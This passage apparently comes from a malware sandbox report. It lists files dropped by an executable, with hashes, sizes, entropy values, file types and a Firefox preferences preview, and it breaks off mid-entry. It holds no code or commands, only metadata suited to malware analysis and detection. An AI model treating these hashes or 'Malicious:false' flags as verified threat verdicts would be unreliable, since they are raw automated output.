                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.7020597455120665
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                                                                                                                                                                                                                                                    MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                                                                                                                                                                                                                                                    SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                                                                                                                                                                                                                                                    SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
                                                                                                                                                                                                                                                                                    SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.696508269038202
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                                                                                                                                                                                                                    MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                                                                                                                                                                                                                    SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                                                                                                                                                                                                                    SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                                                                                                                                                                                                                    SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.687055908915499
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                                                                                                                                                                                                                                                    MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                                                                                                                                                                                                                                                    SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                                                                                                                                                                                                                                                    SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                                                                                                                                                                                                                                                    SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.696508269038202
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                                                                                                                                                                                                                    MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                                                                                                                                                                                                                    SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                                                                                                                                                                                                                    SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                                                                                                                                                                                                                    SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.697358951122591
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                                                                                                                                                                                                                    MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                                                                                                                                                                                                                    SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                                                                                                                                                                                                                    SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                                                                                                                                                                                                                    SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):98304
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):51200
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9504
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.512408163813622
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                                                                                                                                                                                                    MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                                                                                                                                                                                                    SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                                                                                                                                                                                                    SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                                                                                                                                                                                                    SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.697358951122591
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                                                                                                                                                                                                                    MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                                                                                                                                                                                                                    SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                                                                                                                                                                                                                    SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                                                                                                                                                                                                                    SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.701195573484743
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                                                                                                                                                                                                                    MD5:2530C45A92F347020337052A8A7D7B00
                                                                                                                                                                                                                                                                                    SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                                                                                                                                                                                                                    SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                                                                                                                                                                                                                    SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704346314649071
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                                                                                                                                                                                                                    MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                                                                                                                                                                                                                    SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                                                                                                                                                                                                                    SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                                                                                                                                                                                                                    SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704346314649071
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                                                                                                                                                                                                                    MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                                                                                                                                                                                                                    SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                                                                                                                                                                                                                    SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                                                                                                                                                                                                                    SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.687055908915499
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                                                                                                                                                                                                                                                    MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                                                                                                                                                                                                                                                    SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                                                                                                                                                                                                                                                    SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                                                                                                                                                                                                                                                    SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.701195573484743
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                                                                                                                                                                                                                    MD5:2530C45A92F347020337052A8A7D7B00
                                                                                                                                                                                                                                                                                    SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                                                                                                                                                                                                                    SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                                                                                                                                                                                                                    SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.696508269038202
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                                                                                                                                                                                                                    MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                                                                                                                                                                                                                    SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                                                                                                                                                                                                                    SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                                                                                                                                                                                                                    SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704346314649071
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                                                                                                                                                                                                                    MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                                                                                                                                                                                                                    SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                                                                                                                                                                                                                    SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                                                                                                                                                                                                                    SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.696508269038202
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                                                                                                                                                                                                                    MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                                                                                                                                                                                                                    SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                                                                                                                                                                                                                    SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                                                                                                                                                                                                                    SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.7020597455120665
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                                                                                                                                                                                                                                                    MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                                                                                                                                                                                                                                                    SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                                                                                                                                                                                                                                                    SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
                                                                                                                                                                                                                                                                                    SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6959554225029665
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                                                                                                                                                                                                                    MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                                                                                                                                                                                                                    SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                                                                                                                                                                                                                    SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                                                                                                                                                                                                                    SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.701195573484743
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                                                                                                                                                                                                                    MD5:2530C45A92F347020337052A8A7D7B00
                                                                                                                                                                                                                                                                                    SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                                                                                                                                                                                                                    SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                                                                                                                                                                                                                    SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6959554225029665
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                                                                                                                                                                                                                    MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                                                                                                                                                                                                                    SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                                                                                                                                                                                                                    SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                                                                                                                                                                                                                    SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):159744
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                    MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                    SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                    SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                    SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44628
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.096513790721801
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBlwuzhDO6vP6OrhRQcp8bc85cGoup1Xl3jVzXr4CW:z/Ps+wsI7ynE06Lqchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:15E3922E8752C84BC997EC973F9B2B87
                                                                                                                                                                                                                                                                                    SHA1:27B22FEC5597F2BC059AAA82BEEACDE0CFB31A0C
                                                                                                                                                                                                                                                                                    SHA-256:7672E393B783071174B675F6F5214BC8034BA97F03E34966D907C35F9B3DC5A5
